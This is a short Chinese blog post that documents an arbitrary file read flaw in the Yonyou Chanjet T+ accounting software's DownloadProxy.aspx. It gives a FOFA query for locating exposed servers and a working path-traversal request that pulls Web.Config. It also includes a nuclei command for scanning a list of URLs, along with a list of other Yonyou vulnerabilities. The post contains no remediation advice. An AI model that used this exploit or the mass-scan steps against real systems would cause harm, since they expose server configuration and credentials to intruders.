用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

漏洞描述

用友 畅捷通T+ DownloadProxy.aspx文件存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器上的敏感文件

漏洞影响

用友 畅捷通T+

FOFA

app="畅捷通-TPlus"

漏洞复现

登录页面

image-20220909104559292

验证POC

/tplus/SM/DTS/DownloadProxy.aspx?preload=1&Path=../../Web.Config

image-20220909104628456

 

nuclei-pocs

nuclei -t nuclei -t yonyou_changjietong_readfile_DownloadProxy.yaml -l url.txt

 

 

nuclei-poc  关注北极星sec公众号回复0921获取

 

 

 

用友漏洞待更新记录

  • 用友 U8 OA test.jsp SQL注入漏洞

  • 用友nc v6.5 远程命令执行漏洞 (CNVD-2021-30167)

  • 用友 畅捷通T+ DownloadProxy.aspx 任意文件读取漏洞

    • 用友 U8 OA getSessionList.jsp 敏感信息泄漏漏洞

    • 用友 NCCloud FS文件管理SQL注入

    • 用友 NC NCFindWeb 任意文件读取漏洞

    • 用友 NC bsh.servlet.BshServlet 远程命令执行漏洞

    • 用友 GRP-U8 Proxy SQL注入 CNNVD-201610-923

    • 用友 FE协作办公平台 templateOfTaohong_manager.jsp 目录遍历漏洞

    • 用友 ERP-NC NCFindWeb 目录遍历漏洞

    • 用友nc v6.5 反序列化漏洞 补丁绕过

    • 用友nc v6.5 反序列化漏洞

    • 用友nc v6.5 反射型xss

    • 用友nc v6.5 前台任意文件上传漏洞

    • (CNVD-2021-37786)用友nc Cloud FS 文件管理系统 任意账户登录漏洞

    • 用友 GRP-u8 前台存在任意文件上传漏洞

    • 用友nc IUFO v5.3 反射型xss

    • 用友nc 控制台绕过漏洞

    • 用友nc 数据库密码解密

 

posted @   idyork  阅读(1419)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· 微软正式发布.NET 10 Preview 1:开启下一代开发框架新篇章
· 没有源码,如何修改代码逻辑?
· NetPad:一个.NET开源、跨平台的C#编辑器
· PowerShell开发游戏 · 打蜜蜂
· 凌晨三点救火实录:Java内存泄漏的七个神坑,你至少踩过三个!
点击右上角即可分享
微信分享提示